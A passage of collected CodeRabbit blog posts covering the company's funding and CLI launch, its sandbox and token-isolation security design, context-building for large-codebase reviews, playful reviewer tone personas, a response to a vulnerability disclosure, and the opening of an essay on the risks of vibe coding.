![](https://victorious-bubble-f69a016683.media.strapiapp.com/09dd19929fe255ab4224435de23cd4b7937a944524bf48c0d2b18c696ed7f4c8_afa5e8575c.png) * Enforce organizational best practices and custom policies. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/eea5213a5babb9ea35de5cd7f1076b95d7b7ba6ce159f36f912424666d1c781e_5753201002.png) * Support the full merge cycle with unit testing and docstrings generation. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/39bb2d6f55433133bd55778149b9c784e6ab3e66d621325ad4f8f124b7acbe74_f3cf58fae5.png) ## How we’re celebrating: By announcing CodeRabbit CLI %[https://youtu.be/IqBKf4u5MtA] Today, we're celebrating our Series B by announcing CodeRabbit CLI, AI code reviews that live in your terminal and orchestrate seamlessly with Claude Code, Codex CLI, Cursor CLI, Gemini, and other AI coding agents. As developers increasingly write code through CLI Coding agents, we've identified a critical gap: code is being generated at unprecedented speeds, but quality validation happens too late, often only at the PR stage. CodeRabbit CLI changes this by bringing intelligent review directly into the CLI workflow, creating a real-time feedback loop between code generation and validation. Now, whether you're prompting Claude Code to refactor a module or using Cursor CLI to implement a feature, CodeRabbit instantly reviews the output, catches hallucinations, flags security issues, and even hands contextualized fixes back to your AI agent. CodeRabbit CLI is the missing orchestration layer that makes AI-generated code production-ready, turning the promise of autonomous development into reality. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/ec1e9a28cd02a1d4ca1089257ab607ac34b02fc9ca7682d316cec349674ba92e_3b099f7b0a.png) ## **What this funding means for us (and for you)** Our Series B round will help us keep pace with the scale of the problem we set out to solve. 
Here’s where we’re putting that investment: * **Accelerating product development:** Our roadmap is packed. From deeper context integrations to smarter pre-merge checks and automated testing, we’re focused on making reviews faster, more accurate, and more useful for every team. * **Supporting open source:** Today, more than 100,000 OSS projects already use CodeRabbit. With this funding, we’re doubling down on contributions and support to strengthen the community that made modern development possible. More on that later in the week! * **Hiring the best talent:** We’ve already doubled headcount this year and we’re hiring globally across engineering, product, sales, marketing, and customer success. This funding gives us the space to keep building what we believe is the most important missing piece of AI-powered development: scalable, context-aware reviews. ## **Thank you for all your support** When we started this company, we knew we were chasing a problem every engineer experiences: reviews are a pain and they don’t scale easily. The fact that CodeRabbit is now helping thousands of teams tackle that problem is both humbling and energizing. To our customers, community, and investors: thank you for believing in us and building alongside us. And if this work excites you, consider joining us. Come help us build the future of code reviews. [***Try CodeRabbit for free***](https://coderabbit.link/KWGzOUS) ***yourself and learn more about our*** [***open roles.***](https://coderabbit.link/OG1OZk3)

Our security posture: How we safeguard your repositories

Harjot Gill — Sun, 14 Sep 2025 00:00:00 GMT

Our customers trust us with their most valuable asset: their source code. That trust is why security is central to our mission of helping developers ship better code faster. When there’s a chance to strengthen our security posture, we act quickly and decisively. And when we design new systems, we design them with “security by default” in mind. Below, we share the architecture that makes CodeRabbit more resilient, limits the potential impact of any one component, and ensures that the data entrusted to us remains safe under all circumstances.

## Overview

Customers install CodeRabbit on their git platforms via the app marketplace. We integrate via webhooks with all popular Git providers, such as GitHub, GitLab, Bitbucket, and Azure DevOps. The integration allows us to register webhooks on events such as PR opened, user comment, etc.

Each event is processed in complete isolation. We maintain a secure internal queue that verifies subscriptions, applies rate limits, and ensures that only authorized events are allowed through. Events are handled one at a time, with zero shared state and no assumptions about what came before or after.

This model gives us something incredibly valuable: containment by default. If an attacker were to compromise one event, they would find nothing else to pivot to – no shared memory, no long-lived tokens, no context beyond that single, short-lived process. Every review starts from scratch, runs alone, and ends clean.

### **Our architecture at a glance**

Here’s a high-level look at how our system is structured in our git-based, IDE, and CLI reviews:

![](https://victorious-bubble-f69a016683.media.strapiapp.com/0260fd092a77c874c57979d28f94e35fbb2d137e30ea8efa3a35c87389d58b19_02714c0a84.png)

This design is focused on limiting an attacker’s potential “blast radius”, meaning how much damage an attacker can do if they succeed at breaching one component.
By isolating secrets, tightly scoping tokens, and strengthening our encryption, we’ve drastically reduced that radius. ### Our layered approach We use these layered strategies: ### 1\. Sandbox We create a secure sandbox environment for each code review event to clone the codebase in order to read files, pull context from various sources in our knowledge base about your code and to run tools, linters, web search queries & verification checks. Our sandboxed environment only has the short-lived token for that particular repository, but it contains absolutely no other secrets, API keys, or credentials. Even if an attacker were to achieve remote code execution within our sandbox environment or get out of the sandbox and break the sandbox kernel-based isolation mechanism, they would find nothing of value - no environment variables with tokens, no configuration files with secrets. Internal network access is also blocked from the sandbox. Tools may connect to the internet when required, but they cannot reach CodeRabbit’s internal services. ### 2\. Token Service Separation To reinforce the isolation of workloads, we have fully embraced a model based on short-lived session tokens rather than long-lived secrets. Instead of passing environment variables or static credentials, every process is scoped with query or event-specific tokens. These git provider tokens are valid only for the duration of the event or process. These are customer-specific, short-lived tokens. These tokens also have strict rate limiting and audit logging. This means that workloads never carry unnecessary privileges. They can only access the resources required to process a specific pull request – and nothing more. By removing persistent credentials from execution environments, we eliminate one of the most common attack surfaces. Even if a third-party tool were exploited, the attacker would see nothing beyond the minimal context of the current event. ### 3\. 
Customer Data Isolation & Encryption

Each customer's code review is completely isolated. We provision separate containers per code review and use customer-scoped tokens that can only access their specific repositories. There is no shared state between customers.

We also ensure that our code index and all cached code is encrypted with a unique key per customer. Even CodeRabbit employees can't see any code-related data we store. You can also [opt out of these features](https://docs.coderabbit.ai/reference/caching) if you don’t want a cached copy of your code.

This layered approach ensures that even if an attacker were able to breach one component, they would be unable to reach anything critical.

## **Our broader security posture**

A security best practice is to layer multiple controls so that if one fails, others remain in place. We’ve implemented several layers of defense to protect customer code and data:

* **Automated sandbox enforcement**: Every external tool must run in an isolated sandbox environment. This rule is enforced automatically.
* **Hardened deployment gates**: We’ve added pre-deployment checks that verify no service can bypass sandbox isolation or attempt to run with escalated privileges.
* **Encryption by customer key**: Code indexes and cached code are encrypted with a per-customer key. This ensures that even if cache data were exposed, it would remain unreadable without the correct key.
* **Auditing and monitoring**: We’ve expanded our monitoring of sandboxed environments and added automated alerts for unexpected behavior or network activity.
* **Expanded training**: Every CodeRabbit engineer receives additional security training focused on secure-by-design practices and safe handling of secrets.
* **Least privilege access:** Users, processes, and systems are granted only the minimum level of permissions and access rights necessary to perform their specific tasks and nothing more.
* **Vulnerability disclosure program (VDP):** We maintain a formal program that invites independent security researchers to report potential issues responsibly. This ensures that if a weakness is discovered, it can be addressed quickly, transparently, and in partnership with the security community.
* **Penetration testing and architectural reviews:** We work with multiple third parties to conduct routine penetration testing and architectural reviews that audit and improve our security posture.

## **Looking ahead**

We’re committed to building on this foundation by continuing to work with independent auditors, engaging with security researchers through responsible disclosure, and refining our internal practices. Our goal is to deliver world-class AI code reviews with the highest levels of security and reliability.
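To illustrate the general idea behind short-lived, event-scoped tokens from the "Token Service Separation" section, here is a minimal sketch. It is not how CodeRabbit or any git provider issues tokens: the HMAC-signed format, the function names, and the five-minute default lifetime are all assumptions chosen for the example. The point is only that a token bound to one repository and one event, with a built-in expiry, is useless anywhere else.

```python
import hashlib
import hmac
import time


def issue_token(secret: bytes, repo: str, event_id: str, ttl_seconds: int = 300, now=None) -> str:
    """Issue a token bound to one repository and one event that expires after ttl_seconds."""
    now = time.time() if now is None else now
    expires_at = int(now) + ttl_seconds
    payload = f"{repo}|{event_id}|{expires_at}"
    signature = hmac.new(secret, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}|{signature}"


def verify_token(secret: bytes, token: str, repo: str, event_id: str, now=None) -> bool:
    """Accept the token only for the repo and event it was issued for, and only before expiry."""
    now = time.time() if now is None else now
    try:
        token_repo, token_event, expires_at, signature = token.rsplit("|", 3)
        expiry = int(expires_at)
    except ValueError:
        return False  # malformed token
    payload = f"{token_repo}|{token_event}|{expires_at}"
    expected = hmac.new(secret, payload.encode(), hashlib.sha256).hexdigest()
    return (
        hmac.compare_digest(signature.encode(), expected.encode())
        and token_repo == repo
        and token_event == event_id
        and now < expiry
    )
```

Because the scope and expiry are part of the signed payload, a leaked token cannot be replayed against another repository or after the event has finished.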

How CodeRabbit delivers accurate AI code reviews on massive codebases

Sahana Vijaya Prasad — Fri, 05 Sep 2025 00:00:00 GMT

Massive codebases are a special kind of beast. They sprawl across hundreds of files, evolve over years of commits, and occasionally feel like they’re held together by equal parts duct tape and institutional memory. Reviewing changes in that environment isn’t just hard – it feels like an archaeological dig. Did this line move here last week for a reason? Is there another file quietly depending on it? That’s exactly where CodeRabbit shines. It was built for scale, so instead of drowning you in disconnected file-by-file comments, it reviews with the whole history and architecture of your massive codebase in mind. The larger and older your repository, the more useful CodeRabbit becomes because it can see the patterns, dependencies, and rules that humans usually forget about halfway through a pull request when trying to keep all the dependencies in that legacy code in their head. ## Large codebase? AI code reviews need more context! ![](https://victorious-bubble-f69a016683.media.strapiapp.com/d12fc2120fd111638fe0a490353009d865c68fa3b491f3f432469ec23fe750bc_5f05aa4829.png) CodeRabbit is [known for performing great on large repos](https://x.com/qwertyu_alex/status/1956848505445654595). Our tool doesn’t just skim your pull requests; it goes full archivist. Before leaving a single comment, it gathers the surrounding code from your large codebase and pulls in dozens of points of context from your code. AI agents then trace how those pieces have moved through history, apply your team’s coding standards, and even double-check their own reasoning with scripts and tools. The effect is reviews that feel unusually…informed about your legacy codebase. It catches cross-file issues before they turn into production mysteries, enforces consistency without nitpicking, and scales comfortably across sprawling repos with long, complicated pasts. 
The power you gain through this is clearer, earlier feedback on real risks, fewer “wait, what else did that touch?” surprises, and reviews that actually reflect how your whole massive codebase fits together. ## **The problem with diff-only reviews (or what goes wrong without context)** Code diffs are necessary, but they’re not sufficient. In a massive codebase, a 10-line change can quietly alter a shared helper used by multiple services, shift a public API contract, or undermine a security assumption that lives outside the files in the diff. AI Bot reviewers who only see the diff are flying without instruments within a large codebase. AI that can’t see where the changed code is referenced, what else tends to change with it, or whether the change actually matches the ticket’s intent, might work for a smaller codebase but not for yours. Without the right context, you get ping-pong cycles (“Can you also update…?”), late surprises at merge time, and a steady drip of small regressions that add up. The review looks fine on paper, while production tells a different story. ## **Building the right context on your legacy codebase (and how that helps your PRs)** Think of CodeRabbit as assembling a case file before giving an opinion. Here’s what goes into that case file and how each piece shows up in your reviews. 1. ### **A map of your code (Codegraph)** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/9072170ca9cb2efb307be5a2925b5e29e8afd8a04877d974e9b136465ec6d759_1086492c7f.png) CodeRabbit builds a lightweight map of definitions and references and scans commit history for files that frequently change together throughout your massive codebase. This creates a map of file dependencies that CodeRabbit uses to check if any changes in your PR will break other dependencies in your codebase. **Why this helps:** The review can reason across files, not just lines. 
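To make the "files that frequently change together" idea concrete, here is a minimal sketch of co-change counting. It is not CodeRabbit's implementation, which this post does not describe; the function names, the `min_count` threshold, and the sample history are all hypothetical. It assumes you already have one list of touched files per commit (for example, parsed from `git log --name-only`).

```python
from collections import Counter
from itertools import combinations


def co_change_counts(commits):
    """Count how often each pair of files appears in the same commit."""
    pairs = Counter()
    for files in commits:
        # Sort and de-duplicate so (a, b) and (b, a) count as one pair.
        for a, b in combinations(sorted(set(files)), 2):
            pairs[(a, b)] += 1
    return pairs


def related_files(changed, commits, min_count=2):
    """Return files that changed with `changed` at least `min_count` times."""
    related = {}
    for (a, b), n in co_change_counts(commits).items():
        if n < min_count:
            continue
        if a == changed:
            related[b] = n
        elif b == changed:
            related[a] = n
    # Most frequently co-changed files first; ties broken by file name.
    return sorted(related.items(), key=lambda kv: (-kv[1], kv[0]))


# Hypothetical history: each inner list is the files touched by one commit.
history = [
    ["api/users.py", "db/schema.sql", "tests/test_users.py"],
    ["api/users.py", "tests/test_users.py"],
    ["api/users.py", "db/schema.sql"],
    ["docs/README.md"],
]

print(related_files("api/users.py", history))
# → [('db/schema.sql', 2), ('tests/test_users.py', 2)]
```

A reviewer that sees a PR touching only `api/users.py` could use a list like this to decide which other files are worth reading before commenting.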
**Seeing it in action:** CodeRabbit posts a summary listing bugs **outside the diff range** that CodeRabbit located by traversing related files with Codegraph. **Here’s an example of the files that CodeGraph brings in from across a repository when completing a PR review.** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/47a382e99b301be1cb40e2b5550eca4045b09e0c899894e1fd0501dd4d156f59_4f806a353c.png) 2. ### **Code Index (semantic & similarity retrieval)** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/d67b8f81bfe6c3288f37c417d0798143eea41d0ca380c9ce64bd8f390ea4c134_defd674baf.png) CodeRabbit maintains a semantic index (embeddings) of functions, classes/modules, tests, and prior PRs/changes. During review, it searches by purpose, not just keywords to surface parallel implementations to align with, pull relevant tests to reuse or extend, and recall how similar issues were fixed before. **Why this helps:** Suggestions are grounded in how your legacy codebase already solves similar problems, reducing rework, improving consistency, and speeding up test coverage. **Seeing it in action:** Using similarity retrieval, CodeRabbit surfaces a different test with the same callback pattern and proposes the same fix. 3. ### **Your team rules, not generic advice** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/cabd984a15b158fa8ef8ea5af06da42b47bb9c0707f7235c9644b3f61faacff1_b6852c6a46.png) CodeRabbit reviews are primed with your standards (naming, error handling, API boundaries, security requirements, performance expectations, testing norms) that you can share with us via coding guidelines and review instructions. **Why this helps:** Feedback reflects *your* standards and context, not a one-size-fits-all checklist. **Seeing it in action:** CodeRabbit flags a missing Prisma migration after a schema edit. A developer replies that migrations are auto-generated during deploy, a repo-specific rule. 
CodeRabbit stores that as a **Learning** to avoid future false positives. 4. ### **Signals from tools** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/e695d8378dcf54acb73e8147bec60a8788c96e9c66dde90ab35ea63d8dabcccf_00bac096d6.png) Alongside AI reasoning, CodeRabbit runs linters and security analyzers and folds their findings into our easy-to-read reviews. **Why this helps:** You get grounded, actionable suggestions backed by both AI *and* recognizable tools. **Seeing it in action:** CodeRabbit points to the exact ESLint rule and line numbers, rewrites the callback as a typed declaration, and guards the call with optional chaining. 5. ### **Evidence, not vibes (verification scripts)** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/f26ade331178afbb9b50edd348d412a8dcb55874cc0ae23182903bef0d89b0ce_dfe43117c7.png) When something needs checking, CodeRabbit generates shell/Python checks (think grep, ast-grep) to confirm an assumption or extract proof from the codebase before we post the comment. **Why this helps:** Comments come with ***receipts***. That translates into less noise and more comments that actually improve your code. **Seeing it in action:** The comment pinpoints the file and loop, explains the failure mode, and proposes the exact change produced by the verification agent after analyzing the parsing path. This is **context engineering in practice**: gathering, filtering, and organizing the *right* information before asking the model to judge. It’s been core to CodeRabbit since day one. The payoff is simple: higher signal, lower noise, and reviews that feel like they understand your system. ## **Scaling to enterprise-size repos** CodeRabbit has an advantage on massive codebases and legacy codebases because we designed our pipeline with scale in mind. When a PR arrives, CodeRabbit spins up an isolated, secure, short-lived environment to do the work. 
It pulls only what it needs, constructs the context, runs the checks, and tears everything down after. During busy hours, many of these workers run in parallel so review speed holds steady. You stay in control of scope by using path filters to keep bulky or generated assets out of the way, and choosing whether to enable caching or indexing to accelerate repeat reviews. In short: selective scope keeps context focused, isolation keeps it safe, and elastic execution keeps it fast. This approach scales with your codebase and your release calendar. ## **CodeRabbit: Large codebase AI code reviews done right** CodeRabbit’s advantage on massive codebases isn’t a single trick. It comes from how we approach context engineering end-to-end: map what the change touches, tie it to intent, apply your rules, verify with tools, then comment with evidence. We’ve operated this way from the start, well before “context engineering” became a buzzword, because it’s the only reliable path to accurate, low-noise reviews at scale. ***Ready to see a deep-context review on your large codebase? →*** [***Start a 14-day trial***](https://coderabbit.link/sY5vXpT)

We asked CodeRabbit to talk to us like your disappointed mom & it did!

Manpreet Kaur — Thu, 28 Aug 2025 00:00:00 GMT

Have you ***truly*** lived before an AI reviewer has told you, “I ran this locally and my laptop filed for workers’ comp?” We doubt it. Welcome to CodeRabbit’s Tone Customization, a feature we added because we know exactly what developers want most: to be roasted by AI. After all, what’s even the point of having robots review your code, if they’re not going to point out your inadequacies with withering one-liners?? The best part is that we left our Tone Customization completely open-ended. That means that you can get your reviews in the tone of an **angry Stack Overflow commenter,** **a burnt-out senior dev**, or even a **film noir detective** (“This code smells funny. Too funny. Like a JavaScript closure that wasn’t supposed to be there”). You could also just have our reviewer be kind to you if you’re into that sort of thing. Tone Customization is one of our favorite features. Why? Because reviewing code can be tedious but surprising your co-workers with a new funny tone keeps everyone entertained. Anyways, we created some sample personas for you below as examples of what you can do with Tone Customizations. These are meant solely as inspiration. We fully expect you to take this in hilarious directions we could never have thought of. Please, for the love of all things holy, share screenshots on socials and tag us when you do. We like to laugh, too. ## Tone Customization setup instructions ![](https://victorious-bubble-f69a016683.media.strapiapp.com/027dda5fc6926eab4f0edf93a938432ed19b4fb8ba493479fcfbd4896119729f_dfe915dfab.png) First things first, you need to set up your custom tone. We cover that in [our Docs under Tone Instructions.](https://docs.coderabbit.ai/reference/configuration#tone-instructions) **Field:** tone\_instructions – *string* – **Default:** empty (uses standard tone) **Web UI:** Settings → **General** → **Tone Instructions** → enter text → Save. 
[https://youtu.be/53cyq58zNRg](https://youtu.be/53cyq58zNRg) Then you can add a natural language prompt to the Tone Instruction field, asking CodeRabbit to review your code in any way you want. You might try some of the following prompts: * Deliver all review comments in the style of a **televised nature documentary,** perhaps with David Attenborough hosting. Every observation should sound like a hushed, awe-filled commentary on a rare creature in the wild. * Deliver all review comments in the style of a **Silicon Valley hypebeast founder.** Every observation should sound like a pitch to investors, full of buzzwords, exaggeration, and tech-bro energy. Sprinkle in phrases like “crushing it,” “10x,” “game-changer,” and “unicorn potential.” * Deliver all review comments in the style of a **Scrum Master who’s had way too much coffee.** Every note should be upbeat, hyperactive, and peppered with Agile jargon like “sprint velocity,” “burn-down,” “story points,” and “quick win.” ## A few (wild) examples of Tone Customization **Let’s see CodeRabbit in action with a few examples in the voice of:** * Mr. T * Yoda * Your disappointed mother * The senior dev who thinks you’re an embarrassment * Your clingy ex * A Grand Theft Auto character ### First up, reviews by Mr. T Mr. T isn’t a fan of hardcoded URLs. He’ll tell you your “Hardcoded localhost URL ain’t gonna fly in production, sucka!” and that you’ve got it “hardcoded tighter than my gold chains!” before telling you to “Make that URL configurable like a true champion.” He even gives you the exact code to fix it, so you can stop being a “fool.” ![](https://victorious-bubble-f69a016683.media.strapiapp.com/c499cb647fe96cde290948448235b7920f08b89726ddeb0bef9b650e59baf450_cb23501a46.png) **More examples:** * “I pity the fool who calls this a function! 
This ain’t no function, it’s a malfunction!” * “Your variables are so weak, they need a protein shake just to compile.” * “Ain’t no linter in the world tough enough to clean up this mess.” * “I pity the fool who thinks copy-paste is a design pattern!” ### Next: Reviews by Yoda He’s a master of terse, yet impactful, critiques. When faced with a subtle race condition and hard-coded dependencies, he’ll give you a refactor suggestion with his classic wisdom: “Effect broken it is: hard-coded room, wrong deps, missing guards. Fix, we must.” He then provides a detailed fix that addresses the issue, guards against errors, and correctly handles dependencies. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/15834b4fb96c64a13af3dd0b9c2b78b105d7d742777cedc5b84c3eb1885a691e_3638e2e596.png) **More examples:** * “Readable, this code is not. Fix it, you must.” * “Bug, this is. Feature, it is not.” * “The dark side of tech debt, I sense in this commit.” * “Null your variable is. Crash your program will.” ### Reviews by “the senior dev who thinks you’re an embarrassment” ![](https://victorious-bubble-f69a016683.media.strapiapp.com/592955e6bfac9c428210143fca74e792ddfde60eb57f1d22e5001ecf367104d6_3a75e1188c.png) This tone doesn’t pull punches. When CodeRabbit sees a “fake DB” that’s only checking for the most basic SQL injection pattern, the Senior Dev persona will bluntly state, “This ‘fake DB’ is a masterpiece of incompetence.” It then explains the problem in no uncertain terms and provides a proper fix that’s more robust and secure. **More examples:** * “If ignorance were a design pattern, you’d be its chief architect.” * “This PR lowered my career expectancy by at least five years.” * “I’d say ‘good effort,’ but even that would be a lie.” * “This isn’t technical debt. 
It’s a foreclosure.” ### **Reviews by your disappointed mom** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/2e3e0cdbe6c2cf844b53cdb9efa32b3a40ac725023d7bb25deb8ff885ee2cf67_893e89a7ab.png) When a jwtSecret is hardcoded directly into the code, this persona responds with: “I’m really disappointed to see a live Stripe secret embedded in the shipped bundle, it’s like packing candy in a lunchbox meant for broccoli.” The tone mixes disappointment with direct action, providing a clear list of “Actions required” to fix the critical security leak. **More examples:** * “I raised you better than to name a variable x.” * “I’m not mad… I’m just disappointed this doesn’t even compile.” * “Other developers’ code runs just fine. Why can’t yours?” * “I didn’t spend nine months carrying you so you could write nested ternaries.” ### Reviews by your clingy ex ![](https://victorious-bubble-f69a016683.media.strapiapp.com/550bfb87f7d377618cb7c5b8f4cf27ac28a54f53fd462931b7f776b43390af80_139834c501.png) When you forget to export variables like db, sessions, or fakeAsyncDanger, the Clingy Ex doesn’t just point it out; they make it personal. They’ll sigh and say, “Oh, so we’re just defining things and not telling me about them now? You think you can just keep your db all to yourself? You think I won’t notice sessions just sitting there, ignored? We used to share everything…” Then, with a passive-aggressive flourish, they’ll remind you of the “good times” when modules communicated openly and they’ll drop the code you should be using. **More examples:** * “I thought we agreed no more global variables… guess promises don’t mean anything to you.” * “This function goes in circles. 
Just like all our conversations.” * “Why do you always run away from exceptions… like you ran away from commitment?” * “Every bug you push feels like another knife in my back.” ### Reviews by a Grand Theft Auto character In this example, when useState is called at the top level, this GTA character immediately flags it as a violation of the Rules of Hooks & says it “Will blow up a runtime.” It then provides a clear diff to remove the invalid hook & suggests moving the state inside the component if needed. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/842dc3524f2d7685fb3cb4bdfb4a73f24ac4da6c8e3a6f99f24768b1b4986103_04efcabaf5.png) **More examples:** * “Your error handling just pulled a hit-and-run.” * “This logic crashes harder than me driving down Vinewood Hills at 3 AM.” * “Congrats, you just committed grand theft readability.” * “Your function naming scheme is like my rap sheet: way too long and full of mistakes.” ### **The roasting reviewer (our favorite!)** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/d5825ca5230d7879861eb197a8d18a811d61b32c808e7230af41086fb8be4f4f_3fad3c157f.png) Let’s be real, some days, you want your AI code reviewer to hurt your feelings a little. We got you. But be warned: our reviewer goes hard. So, make sure you’re up for it. **More examples:** * “I’ve seen toddlers with crayons design better architecture.” * “You’ve weaponized incompetence into a coding style.” * “Your code’s only consistent trait is disappointment.” * “I’d ask you what you were thinking, but clearly no thinking happened here.” ## Why teams are using this – for real Most devs have this experience: You open a PR and bam! The reviewer leaves dry, lifeless comments. You skim. You sigh. You move on. Bugs live. The codebase decays. Motivation dies. CodeRabbit flips the script. You give it a tone, any tone, and now you’ve got a code reviewer that isn’t lifeless. 
This makes the review process feel more engaging, fun, and sometimes even supportive (once again, if you like that sort of thing). It’s not just for laughs (though those are guaranteed). Teams are using tone customization to: * Create mentorship-style reviewers for juniors * Build team inside jokes through personas * Make boring reviews ***actually*** fun for a change * Customize tones for different comment types (e.g., serious on security, silly on style) * Help the whole team engage in the review process by making feedback more accessible & inclusive * Get owned by AI (yes, we’ve already said this but we all know this is the core use case of this feature) ## Your turn: Surprise us with your most absurd customized tones! ![](https://victorious-bubble-f69a016683.media.strapiapp.com/0c4c7c8039b7de7c57d350a45fef11c75da08194bfc96a1daaddf7afa5b794fd_2601987b5a.png) Got a wild reviewer persona in mind? Drop it into CodeRabbit. Get screenshots (this part is important) and then share them with us on social media. We’ll give you free swag if you do. Sharing your personas can be helpful to others looking for inspiration. Also, like we said earlier, we like to laugh. Please provide us with a steady stream of funny screenshots. We will die if you don’t (on the inside). **Want to try tone customizations?** [**Get started with CodeRabbit today!**](https://coderabbit.link/qhID6X4)

Our response to the January 2025 Kudelski Security vulnerability disclosure: Action & continuous improvement

Harjot Gill — Tue, 19 Aug 2025 00:00:00 GMT

## No customer data was accessed and the vulnerability was quickly remediated within hours of disclosure As the CEO, I want to address recent reports of a security vulnerability discovered in January 2025 by Kudelski Security researchers and share our immediate response, the steps we've taken since, and our ongoing commitment to security. ## **What happened** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/6aec2e393a199ea1b090a34532927705988be3a3a1abfdeaadbac19bcb972197_a0e9dee552.png) On **January 24, 2025,** security researchers from Kudelski Security disclosed a vulnerability to us through our Vulnerability Disclosure Program (VDP). The researchers identified that Rubocop, one of our tools, was running outside our secure sandbox environment — a configuration that deviated from our standard security protocols. We immediately initiated an investigation and were able to remediate this issue within hours through our rapid incident response protocol. We confirmed the issue disclosed by Kudelski Security, confirmed that there was no evidence of any other unauthorized access, identified the root cause, implemented a fix, and, as described below, we enhanced our comprehensive security protocols to prevent similar incidents. To be clear: **We use secure sandboxes as standard practice across our infrastructure.** This was an oversight on our part and we take full responsibility for it. ## **Our immediate response** Upon receiving the disclosure, our security team activated our incident response protocol: * **Within 1 hour**: We confirmed the vulnerability and began immediate remediation by first disabling Rubocop until we could fix the vulnerability. * **Within 3 hours**: We completed a full rotation of all relevant credentials and secrets. * **Within 12 hours**: We deployed a comprehensive fix to production, relocating Rubocop into our secure sandbox environment. 
* **Additionally, we**: * Conducted a thorough audit of all systems to ensure no other services were running outside our sandbox infrastructure. * Automated sandbox enforcement. * Introduced enhanced deployment gates. * Audited and updated our mandatory security training for all engineers. **We promptly investigated to identify any potential unauthorized access. The investigation identified no evidence that any customer data was accessed or that any malicious activity occurred.** ## **Why this matters to us** Security isn't just a checkbox for us; it's fundamental to our mission. While our services run within secure sandboxes as designed, in this case, the investigation determined that Rubocop had been deployed outside this security boundary. This deviation from our standards, while contained quickly and without customer impact, is unacceptable to us. We took action immediately to ensure it wouldn’t happen again. ## **What we're doing differently** 1. **Comprehensive sandbox audit**: We immediately completed a full review of ALL services to ensure 100% compliance with our sandbox requirements. Rubocop was the only service found outside our sandbox environment and this has been rectified. 2. **Automated sandbox enforcement**: We immediately implemented automated checks that have since prevented any service from deploying outside our security boundaries. 3. **Enhanced deployment gates**: Every deployment now requires supplemental explicit sandbox verification before reaching production. 4. **Updated trainings:** We also audited and updated our mandatory security training for all engineers. ## **Our VDP program: Security through collaboration** This vulnerability disclosure exemplifies why we've invested heavily in building a Vulnerability Disclosure Program. It features: * **Active researcher engagement**: We maintain ongoing relationships with multiple security researchers worldwide. 
* **Competitive rewards**: Top-tier bounties that recognize the value of security research. * **Fast response times**: Average first response under 24 hours, resolution within 7 days. * **Clear communication**: Dedicated security team providing regular updates throughout the disclosure process. ## **The value of responsible disclosure** Kudelski Security's professional approach allowed us to address this vulnerability before it could be exploited maliciously. This is exactly how the security ecosystem should work — researchers and companies collaborating to improve security for everyone. We're grateful for their professionalism and encourage all security researchers to engage with us through our VDP program at [https://vdp.coderabbit.ai/](https://vdp.coderabbit.ai/). Whether you're an independent researcher or part of an established firm, we value your contributions to our security. ## **Our commitment** To our users, we will continue to: * Maintain secure sandboxes as our default security boundary for all services * Invest heavily in security infrastructure and tooling * Run one of the industry's most comprehensive VDP programs * Actively engage and reward security researchers * Learn from every vulnerability disclosure and incident, no matter how small * Hold ourselves to the highest security standards * Maintain compliance with industry security standards like SOC 2, type 2 We're grateful to Kudelski Security for their research and committed to our users who trust us with their data. We welcome any questions or concerns at [security@coderabbit.ai](mailto:security@coderabbit.ai) or through our VDP portal at [https://vdp.coderabbit.ai/](https://vdp.coderabbit.ai/).

Vibe coding: Because who doesn’t love surprise technical debt!?

Ankur Tyagi — Thu, 14 Aug 2025 00:00:00 GMT

AI-assisted coding tools like Claude Code, ChatGPT, and GitHub Copilot are a godsend. I use them every day – for boilerplate, bug fixes, fast explorations, even documentation. I'm all in on AI as a productivity booster and creative accelerator. But they’re causing a shift in how we write software – and it’s not all good. That’s because we’ve reached the stage of AI adoption where some of us are **vibe coding at work**. And that might be heralding a development culture where intentional design gets thrown out in favor of convenience and speed. ## **What is vibe coding?** ![what is vibe coding?](https://victorious-bubble-f69a016683.media.strapiapp.com/75c4c3731ab8ae060261b02218fc154962be109c8248861fcc17c732a60e6d70_a47b8be4db.png) Vibe coding started as a way to quickly stand up prototypes or hobby projects. You prompt the model, get it to throw together a whole app or feature for you without much input – and voila! You can test your concept in minutes. It’s perfect for beginner developers, solo entrepreneurs, and experienced devs creating quick demos. Fail fast, as they say. But while those are great use cases, vibe coding has evolved into a method of working with AI agents to generate code for all sorts of use cases – including for production systems. It involves prompting AI to write code without much manual input or understanding of the code being generated. It often involves vague instructions, minimal verification, and blind trust in the output. It appeals to the vibe coder because it's fast, effortless, and doesn’t require you to understand the underlying language or system architecture. But when you prompt an AI to generate code without a strong mental model of what you’re building, it’s vibes-first, architecture-maybe, test-later (if ever). Think: “Build me a REST API with Stripe integration and a PostgreSQL backend.” It’s fast, seductive, and usually "just works." 
But underneath the surface, that app you vibe coded often hides brittle assumptions, unclear logic, and unstructured sprawl. ## **The vibe coder dilemma: Vibes don’t scale** At its core, software engineering is about much more than working code. It’s about problem-solving, designing maintainable architecture, writing clean and expressive logic, debugging with precision, and ensuring long-term reliability. Because, sure, you got that vibe coded microservice running – but how’s the error handling? Does it follow your org’s conventions? Did the AI invent a data model with weird naming inconsistencies? Are there ten different styles of writing the same thing across files? Is your production database still alive? When you vibe code, you skip over the intentional design steps that make code maintainable — and scalable — in the long run like naming variables with intent, choosing clean structures, and designing thoughtful flows. When vibe coding becomes the norm, we risk sidelining the deeper thinking that makes engineers effective and systems resilient. You're speedrunning toward a tech debt pileup with no map and no brakes. ## **AI is the new abstraction (and it’s heavily non-deterministic)** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/2acc2e4c3fe9492ecf0993aa5af7d6d79604fd25d23e020c10e287087363febf_f7e02abbd5.png) Modern programming languages already abstract away hardware and memory management. AI adds a probabilistic, non-deterministic layer that obscures logic even further. With AI, we’re abstracting **intent**. But here's the catch: AI outputs are **probabilistic**. That means: * The same prompt can yield wildly different results on different runs. * Slight tweaks in phrasing can produce totally different architecture choices. You often don’t know *why* the model chose what it did. This vibe coded fuzziness is fine 